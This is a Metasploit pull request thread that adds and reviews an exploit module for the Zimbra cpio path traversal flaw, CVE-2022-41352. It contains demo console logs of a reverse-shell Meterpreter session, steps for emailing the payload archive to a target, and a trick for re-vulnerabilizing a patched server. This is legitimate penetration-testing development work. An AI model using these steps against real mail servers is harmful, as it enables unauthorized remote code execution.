Add exploit for CVE-2022-41352 (zimbra cpio)
rapid7/metasploit-framework pull request #17114
Opened 2022-10-06 17:30 UTC by rbowes-r7

Add an exploit for Zimbra cpio - CVE-2022-41352 (symlink-based path traversal in cpio).

This is basically the same as [CVE-2022-30333](https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333/), just a different file format.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/zimbra_cpio_cve_2022_41352`
- [ ] (set LHOST / RHOSTS)
- [ ] `exploit`
- [ ] Email the generated file to the Zimbra server
- [ ] Wait for shell

Demo:

```
msf6 > use exploit/linux/http/zimbra_cpio_cve_2022_41352
[*] Using configured payload linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set LHOST 172.16.166.147
LHOST => 172.16.166.147

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set RHOSTS 172.16.166.158
RHOSTS => 172.16.166.158

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.166.147:4444 
[*] Encoding the payload as a .jsp file
[*] Adding symlink to path to .tar file: /opt/zimbra/jetty_base/webapps/zimbra/
[*] Adding target file to the archive: public/bdhg.jsp
[+] payload.tar stored at /home/ron/.msf4/local/payload.tar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/bdhg.jsp every 5s [backgrounding]...

[Email the file to the target]

[*] Sending stage (3045348 bytes) to 172.16.166.158
[*] Meterpreter session 1 opened (172.16.166.147:4444 -> 172.16.166.158:44808) at 2022-10-06 10:27:34 -0700

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: zimbra
```

2022-10-11 03:52 UTC, gwillcox-r7 commented
Hi @rbowes-r7 I see the current documentation deals a lot with how to detect if a target is vulnerable but presently don't give much in the way of describing how to actually set up a vulnerable target for testing. Would you be able to provide any more insight or info on this? Zimbra has been somewhat confusing to set up in the past so would like to make sure the setup matches what you have been using to test this module.

2022-10-11 16:00 UTC, rbowes-r7 commented
For sure! @cdelafuente-r7 has definitely set up an environment, and I think others may have as well?

These are my scratch notes.. this is for Ubuntu, but I'd suggest installing on one of the Red Hat OSes since they're vulnerable by default (if you do use Ubuntu, just `rm $(which pax)` then reboot to make it vulnerable).

---

Create a VM

```
HDD = 128gb
Memory/etc don't matter
```

I installed a local DNS server:

```
sudo apt update && sudo apt install dnsmasq
sudo hostnamectl set-hostname mail.example.org
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
```

Configure the host to use it:

```
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo systemctl restart dnsmasq
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
```

Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email.

```
tar -xvvzf zcs-*.tgz
cd zcs*
sudo ./install.sh

* Lots of <enter>
* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
* Yes change the system
* Setup the admin password, probably turn off auto-updates
```

2022-10-11 20:14 UTC, rbowes-r7 commented
It looks like they actually patched Zimbra yesterday:

https://blog.zimbra.com/2022/10/new-zimbra-patches-9-0-0-patch-27-8-8-15-patch-34/

From what I can tell, all they did was add `pax` as a dependency. You can almost certainly remove it and restart the server to make it vulnerable again after installing:

```
[ron@mail conf]$ sudo mv /usr/bin/pax /usr/bin/notpax
[ron@mail conf]$ sudo -u zimbra /opt/zimbra/bin/zmcontrol restart
[...]
```

(I confirmed that that does successfully unpatch it)

2022-10-13 10:36 UTC, cdelafuente-r7 requested changes
Thanks @rbowes-r7 for this module! I just left a couple of comments regarding some missing information in the documentation and an unused method in the code. I tested against Ubuntu 20.04.4 with the `pax` executable removed, as suggested, and it works great!

2022-10-13 16:16 UTC, rbowes-r7 commented on documentation/modules/exploit/linux/http/zimbra_cpio_cve_2022_41352.md
> +This module exploits a symlink-based path traversal vulnerability in `cpio` (that's identified as CVE-2015-1197) that's exploitable in Zimbra. All versions of Zimbra are vulnerable, but the Ubuntu-ba
Oh yeah, they've actually patched it now. I will update

2022-10-18 17:13 UTC, rbowes-r7 commented
I added a sanity check (so it doesn't generate the payload and register the file for cleanup if it's not gonna be able to trigger it), and added links / notes about Zimbra's patch.

2022-10-19 16:59 UTC, rbowes-r7 commented on modules/exploits/linux/http/zimbra_cpio_cve_2022_41352.rb
> +  end
Removed

2022-10-19 17:02 UTC, rbowes-r7 commented on documentation/modules/exploit/linux/http/zimbra_cpio_cve_2022_41352.md
> +This module exploits a symlink-based path traversal vulnerability in `cpio` (that's identified as CVE-2015-1197) that's exploitable in Zimbra. All versions of Zimbra are vulnerable, but the Ubuntu-ba
Added notes about the patches to docs / the module

2022-10-20 13:08 UTC, cdelafuente-r7 commented
Thanks for updating this. It looks good for me now. I tested against Zimbra version 8.8.15.GA.4179 on Ubuntu 20.04.4 with `pax` executable removed manually and verified I got a session after emailing the payload. I'll go ahead and land it.

- Example output
```
msf6 > use exploit/linux/http/zimbra_cpio_cve_2022_41352
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.29
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Encoding the payload as .jsp
[*] Checking the HTTP connection to the target
[*] Adding symlink to path to .tar file: /opt/zimbra/jetty_base/webapps/zimbra/
[*] Adding target file to the archive: public/ogmdlbs.jsp
[+] payload.tar stored at /home/msfuser/.msf4/local/payload.tar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/ogmdlbs.jsp every 5s [backgrounding]...

(reverse-i-search)`se': exploit verboInterrupt: use the 'exit' command to quit8.144.129
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.29 -o tls=no -a /home/msfuser/.msf4/local/payload.tar
[*] exec: sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.29 -o tls=no -a /home/msfuser/.msf4/local/payload.tar

Oct 20 15:03:50 fra-mbp-9921 sendemail[86258]: Email was sent successfully!
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.0.0.29
[+] Successfully triggered the payload
[+] Deleted /opt/zimbra/jetty_base/webapps/zimbra/public/ogmdlbs.jsp
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.29:37028) at 2022-10-20 15:03:55 +0200

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: zimbra
meterpreter > sysinfo
Computer     : mail.donotexistdomain.foo
OS           : Ubuntu 20.04 (Linux 5.15.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2022-10-20 13:09 UTC, cdelafuente-r7 commented
I had to add a last commit to update the documentation and make `msftidy_docs.rb` happy. Not a big deal.

2022-10-20 13:11 UTC, merged

2022-10-20 13:17 UTC, cdelafuente-r7 commented
# Release Notes
This adds a module that exploits a symlink-based path traversal vulnerability in `cpio` to get unauthenticated remote code execution as the `zimbra` user. This vulnerability is identified as CVE-2022-41352. The module generates a `.tar` file that will need to be emailed to any user on the target Zimbra server.